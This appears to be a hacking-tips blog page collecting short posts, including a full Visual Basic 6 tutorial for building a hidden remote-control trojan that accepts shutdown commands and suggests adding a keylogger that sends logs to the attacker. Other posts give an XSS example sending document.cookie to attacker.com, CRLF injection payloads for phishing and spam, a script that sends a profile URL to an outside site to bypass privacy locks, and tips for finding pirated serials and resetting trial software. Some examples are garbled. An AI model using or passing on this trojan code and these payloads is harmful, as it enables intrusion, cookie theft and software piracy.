Orkut Virus

“ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!”.
Did you  found an error wile opening Orkut?It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).
If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder.

Now use a registry cleaner to delete the registry keys made by this

Easy Method to delete the virus.

open task manager>process tab>there if you find svchost.exe before your user name (remember also system will use svchost.exe don’t end that) just give end process for that then go to run and type C://heap41a and delete all files of that folder..

Continue >>

How to use Facebook Smileys emoticons in Facebook Chat

How to use Bold Underlined Fonts and emoticons Smileys in Facebook Chat

Facebook is one of  the most popular social networking site the world.There are many smiley in face book chat conversation message to be used.Here is the list of   some popular smiley codes to use in facebook chat.check out this image and their code just write the symbol you will get the smiley.

facebook-smileys

There are may tricks in facebook chat.Very few people know that you can use even bold fonts or underlined fonts in facebook chat. To use bold fonts type your message between two asterisks.

e.g. *message*

To type underlined messages type your message between two underscores.

e.g. _message_

If you know some more please share it here

enjoy…

Continue >>

A Java Trick that Pops Message " Ur Account Is Hacked

javascript:function reverse() { var inp = "baruoG yb dekcah si tnuocca koobecaF ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();

copy and paste d Above link On Address Bar.. n replace "baruoG" by ur own Name.. n send it to ur friends

Or u can Manually create Any kind of Alert Box by

javascript:alert(" TYPE ANY MESSAGE HERE TO APPEAR IN ALERT BOX ")

Continue >>

Hack - View Locked Scrapbooks | Lock Scrapbooks

How To Use this Hack?

There are three ways to use this hack.You can choose the one that best suits you.

a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook

or

b> Using this Javascript :

* Navigate to the profile which has disallowed non-friends to view his/her scrapbook
* Run this script in the address bar

* javascript:document.location=’http://scraphack.cspbrasil.com/ViewScraps.php?uid=’+encodeURIComponent(location.href);void(0)

* Wait for 4-5 seconds and you will get to see the scraps.

or

c> Userscript (Credits - D3 ) - The Recommended Method because you need not run any script again and again. Kindly follow the instructions stated below:

* Install Grease Monkey in case you don’t have it - Search for it on google (another way to resort to Firefox)
* Install View Locked Scrapbook Script
* In case you have any problems downloading or operating these scripts, you must read this tutorial.

Continue >>

How to write a simple trojan in vb6 | Creating a Virus

How to write a simple trojan in vb6? Read It >>

Writing a Trojan is a lot easier than most people think. All it really involves is two simpleapplications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using

Private Sub Form_Load()
Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
Client.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination

Continue >>

How to make a Keygen with C++ [and a bit of C# & VB]

Keygen Tutorial

Steps:

1. Download & Install Microsoft Visual C++ Express (2008 - 2010)
[Get the trial off microsoft official website and to keep it for more than 30 days, delete the registration folder in regedit]

2. Start a new project, name it, and select "Windows Forms Application".

3. Select the size of your keygen form and then right click it, properties and on FormBorderStyle, select None.
[This is used to remove the titlebar and windows margins.

4. A little bit below, turn "Maximise/Minimise Box" and "Control Box" to false. Topmost must be true if you want your keygen to always stay on top of other windows.
[Other options such as "Show icon/Show in taskbar" are self explainatory, so set to false if you wish]

5. Now you can start designing your keygen. Either make a "Background Image" on your form1 or from the "toolbox" {look for a hammer icon above} add a "PictureBox". To add an image, click the arrow above the dragged box and "Choose Image", then once selected you can stretch it.

6. You can add labels for text, a progress bar... buttons, text box [this will have your generated serial] and so on, use your imagination.

7. Everything you add pretty much has a "Properties" option which like Form1, you can edit stuff in it.

8. To add music to your keygen, you have two methods. There will be a bit of C# or Visual Basic here but it's easy enough. For implemented music, check this outhttp://msdn.microsoft.com/en-us/library/...S.85).aspx
If you want to skip this, then make a WebBrowser control, make it small and invisible. Put the url to a youtube website or whatever has music to it and it will begin automatically.

9. Animations are simply added by using a .gif file in your picture box instead of a bitmap/jpg.

10. To make your buttons work, just make an event (double click button until you are taken to the code). 
Now there are a few paths you can take for this to generate serials. Let's assume this is the [ Generate ] button.

The way I know so far is below: [You MUST have a "TextBox" so that the below will get generated in it visually]

Code:

private: System::Void button1_Click(System::Object^ sender, System::EventArgs^ e)
{
srand((unsigned)time(0));
int number;
number = (rand()%7)+1;

if (number == 1)
this->richTextBox1->Text = L"XXXX - XXXX - XXXX - XXXX - XXXX";
else
if (number == 2)
this->richTextBox1->Text = L"XXXX - XXXX - XXXX - XXXX - XXXX";
else
if (number == 3)
this->richTextBox1->Text = L"XXXX - XXXX - XXXX - XXXX - XXXX";
else
if (number == 4)
this->richTextBox1->Text = L"XXXX - XXXX - XXXX - XXXX - XXXX";
else
if (number == 5)
this->richTextBox1->Text = L"XXXX - XXXX - XXXX - XXXX - XXXX";
else
if (number == 6)
this->richTextBox1->Text = L"XXXX - XXXX - XXXX - XXXX - XXXX";
else
if (number == 7)
this->richTextBox1->Text = L"XXXX - XXXX - XXXX - XXXX - XXXX";
}

This just makes a variable generate on random from 1 - 7 and each one will have a specific serial.
The code above requires two headers for the script to work : 
#include 
#include 

11. Now that you don't have a control or titlebar, it's most likely you must have a way to exit the application. Use this->Close(); on your [ Exit ] button event.

12. The rest is up to yourself and your creativity, add colours and so on.
F7 to compile, CTRL + F5 to test, and to finish it up in an EXE, select RELEASE below the "Tools"window and compile.

Continue >>

CRLF Injections Tutorial

Here one more knowledge step towards injections... with "CRLF Injection" ..Today you will learn ...

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client’s web-cache, hijacking of web pages, defacement and a myriad of other related attacks. A number of years ago a number of CRLF injection vulnerabilities were also discovered in Google’s Adwords web interface.

Today you will learn:

• What is a CRLF Injection?
• Vulnerability PoC - Comment System
• Vulnerability PoC - Email Form
• Vulnerability PoC - Header Injection
• Patching
• Conclusion

What is a CRLF Injection?

Carraige Return Line Feed (CRLF) work due to improper sanatization in user input. The carriage return is essentially the same as hitting 'Enter' or 'Return', creating a new line. The carriage return can be represented in a few different ways: CR, ASCII 13 or r. Both the carriage return and the line feed do essentially the same thing. Although, the line feed is represented as LF, ASCII 10 or n. These commands are printer commands, the line feed tells the printer to feed out one line and a carriage return said the printer carriage should go to the beginning of the current line. In the event you know the operating system of the target machine it will prove useful to know that Windows uses CR/LF but *nix systems only use LF.

Vulnerability PoC - Comment System

To illustrate the first method of CRLF we will be using a hypothetical comment application which is vulnerable to the attack. Let's say our current comment system looks like so:

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....

Keep in mind both of these posts are legitimate. To exploit the vulnerability our attack will craft a post that will make it seem like he's posting as an administrator. He will enter the following into the comment box:

Yep, doesn't work..n10/04/07/ - Admin I've relocated the login to http://attackersite.com/login.php, you should be able to login there.

This extremely simple injection will change the comment output the following result.

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
09/04/07 - EthernetYep, doesn't work..
10/04/07 - Admin I've relocated the login to http://attackersite.com/login.php

As you can clearly see in the example, by posing as an administrator we are able to phish passwords from the unsuspecting users. By inserting our new line character in to the post we can go down a line and pretend to be an administrator. It's a pretty neat trick.

Vulnerability PoC - Email Form

The second and final example involves a script used to send emails to other users. The catch is that you cannot see the real email address of the person you are sending to. To exploit this we can simple insert the following in to the 'Subject' header:

Hey, it's DavenBcc: dave@email.comdave@email.com

This injection will send the email over to dave@email.comdave@email.com AND the person we originally specified in the 'To' column. These mail forms can also be exploited by spammers in order to hide their identity. By using a similar method as above they can'Cc' and 'Bcc' the message to 100's of other people spamming their

inboxes anonymously.

Vulnerability PoC - Header Injection

As an alternative to inserting the carriage return-line feed in to an input box we can also use a program like Achilles to intercept the POST headers and then modify them. Using a similar example as to the Email Form example above we could change our headers like so:

Content-Type: application/x-www-form-urlencoded
Content-Length: 147


name=This+is+a+test+&emai l= dave@coldmail.comdave@coldmail.com&subje ct=Test&header=Header:
noone@thingy.comnoone@thingy.com
CC: fbi.gov@meow.comfbi.gov@meow.com
Bcc:enigmagroup.test.@eg. com,
psychomarine@enigmagroup. org,
ausome1@enigmagroup.orgausome1@enigmagroup.org
&msg=crlf!

As you can plainly see in the above example we are able to modify the header in order to spam those email addresses.

Patching

The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to $_POST['input']

if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable
{ //start if..
die("CRLF Attack Detected"); //exit program if CRLF is found in the variable
} //end if..

I have commented the code so that you can gain an idea of how we are fixing this vulnerability. As you can see it doesn't take much to thwart this vulnerability. Sadly, not many people are implementing such a patch.

Conclusion

Whether you're dealing with a high risk vulnerability (remote file inclusion) or a low risk one, such as this, you always need to be aware of what you're dealing with In creating this article I hoped to enlighten some of you as to how this vulnerability works. I hope you've enjoyed this article.

Continue >>

Page Sequencing

Page Sequencing

Page sequencing is the term given to the vulnerability that arises as a result of poor session management, thereby allowing the user to take an out of turn action and bypass the defined sequence of web pages. This can be something like moving ahead to a later stage of a financial transaction. This arises due to faulty session/application state management.
XSS Web Application Hijack [Cookie stealing]
User is logged on to a web application and the session is currently active. An attacker knows of a XSS hole that affects that application.
The user receives a malicious XSS link via an e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (guest book, banner) and make it load automatically without requiring user intervention.

[Example] 

< head>
< body>document.location.replace('http://attacker.com/steal.cgi?'+d
ocument.cookie);"> Free CC's!
< /html>

It is a true that most web sites address security using SSL for authenticating their login sessions. When the client connects to a web site two security events take place. The web site must prove that it is the web site it claims to be. The web site authenticates itself by the SSL certificate issued to the domain in question by a trusted third party. Depending on the extent the user trusts the certificate issuer; user can be assured that the web site is what it claims to be.
Once the web site is authenticated by the user, they can choose to establish a secure data connection via the public key mechanism of SSL so that all the data that is transmitted between them is encrypted.
The user must authenticate them self to the web site. The user provides there username/password into a form and this data is transmitted in an encrypted fashion to the web site for authentication. If the client is authenticated, a session cookie is generated with appropriate timeout and validation information. This is sent back to the user as a "secure cookie" , one that is only passed back and forth over SSL.
This can be considered as passing a shared secret back and forth, which is encrypted and is not the actual password and does timeout. If the website does not use cookies, it can look for session codes that are embedded in the site URLs so that they are never stored in the hard disk of the client computer. Some web sites do require their users to obtain client SSL certificates so that the web site can authenticate the clients via these certificates and thus not need this whole username/password scheme.
Cookies were originally introduced by Netscape and are now specified in RFC-2965, with RFC 2964 and BCP44 offering guidance on best practice. Cookies were never designed to store usernames and passwords or any sensitive information. There are two categories of cookies, secure or non-secure and persistent or non-persistent, giving these individual cookies types.
1. Persistent and Secure
2. Persistent and Non-Secure
3. Non-Persistent and Secure
4. Non-Persistent and Non-Secure

Continue >>

XSS Countermeasures

Cross Site Scripting

A Web application vulnerable to XSS allows a user without knowledge to send malicious data to them self through that application.
Attackers often perform XSS exploitation by making malicious URLs and tricking into clicking on them.
These links cause client side scripting languages like VBScript, JavaScript of the attackers choice to execute on the victim's browser.
XSS vulnerabilities are caused by a failure in the web application to properly validate user input.
The simplest description of cross-site scripting can be put as the attack that occurs when a user enters malicious data in a Web site. It can be as simple as posting a message that contains malicious code to a newsgroup. When another person views this message, the browser will interpret the code and execute it, often giving the attacker control of the system. Malicious scripts can also be executed automatically based on certain events, such as when a picture loads. CSS doesn't apply to any single vendor's products, instead, it can affect any software that runs on a web server.
CSS takes place as a result of the failure of the web based application to validate user supplied input, before returning it to the client system. "Cross-Site" refers to the security restrictions that the client browser usually places on data like cookies, dynamic content attributes associated with a web site. This causes the victim's browser to execute malicious code with the same permissions as the domain of the web application, an attacker can bypass the traditional document object model (DOM) security restrictions. The document object model is accessible application interface that allows client-side languages to dynamically access and modify the content, structure and style of a web page.
Cross-Site Scripting (CSS) attacks require the execution of Client-Side Languages (JavaScript, Java, VBScript, ActiveX, Flash) within a user's web environment. Cross Site Scripting can result in an attacker stealing cookies, hijacking sessions, changing of web application account settings and more. The most common web components that are vulnerable to CSS attacks include CGI scripts, search engines, interactive bulletin boards (Forums), and custom error pages with poorly written input validation routines. Also victim does need to click on a link to make the attack happen.
(Attack Example)
Example 1: The IMG tag
http://host/search/search.cgi?query= 
Depending on the website setup, this generates html with the image from host2 and feeds it to the user when they click on this link. Depending on the original web page layout it may be possible to entice a user into thinking this is a valid part of the picture.
Example 2:
http://host/something.php?q= 
If a user clicks on this link a JavaScript popup box displaying the site's domain name will appear. While this example isn't harmful, an attacker could create a fake form or, perhaps create something that grabs information from the user. The request above is easily questionable to a standard user but with hex, unicode, or %u windows encoding a user could be fooled into thinking this is a valid site link.
Example 3:
http://host/Inserthere 

Continue >>

Use Google to get almost any software's serial no. [Gourab Paul]

Use Google to get Serial No of any Software
Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....

But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....

So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss

Just follow the steps as instructed below

1) Go to Google
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it

Now you receive Many pages which contains Serial no, Crack, Patches....

Just make a try, this simple trick works for many peopl.

Demo: 94fbr office 2007
(Its will list the pages contains the keys for Office 2007)

Continue >>

Use SSH Tunneling to surf net invisibly

Unable to surf net over work/college ? Want to surf net invisibly ? Well,we have a solution for that,SSH Tunneling.An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too.SSH Is pretty awesome.
Without leaving your seat,you have a way to control a computer which ay be located anywhere on this planet.And if you have access to a PC with an SSHd installed, you can channelize your traffic through that computer,which is particularly is useful in situations when -

1. The site is normally inaccessible from your current location (School/Work)
2. You do not want your connection monitored (You’re using a WiFi hotspot/You’re in a country that monitors/censors your internet usage)

In this tutorial,I will be using Firefox on Gentoo Linux , but it its applicable to all distributions of linux.
Step One: Setting Up the Tunnel
All common Linux distributions come with openssh packages. To check whether you have ssh installed already type the command "which ssh". Gentoo has opensh package preinstalled,so no tension :)
First we need to SSH to the server that we want to tunnel through, open up terminal and type the following command

ssh -ND @

Replace with a port number of your choice; This will be the LOCAL port whichFirefox will use to tunnel the traffic later on…Try to choose a high and random port number so as nobody scans or sneaks them in (system admin and firewalls)
Practical Example:

ssh -ND 2945 rishabh.cs07@sviet.ac.in

Now enter your password as usual, and it will hang after authentication, which is perfectly normal as it isn’t an interactive session- Now minimize the terminal and open Firefox.
Step Two: Configuring Firefox
In Firefox, Go to (Depending upon which version you are using)

preferences -> advanced -> Network -> connection settings
or
Tools –> options –> Advanced –> Network –> settings

A new window should appear,select the “Manual Proxy Configuration” option, you’ll need to type some information in the ‘SOCKS Host’ section.

Host: localhost 
Port: Port you used in the SSH command earlier.

Save your changes..Just to make sure it worked, check your IP with an online IP checker :)

Happy Surfing

Continue >>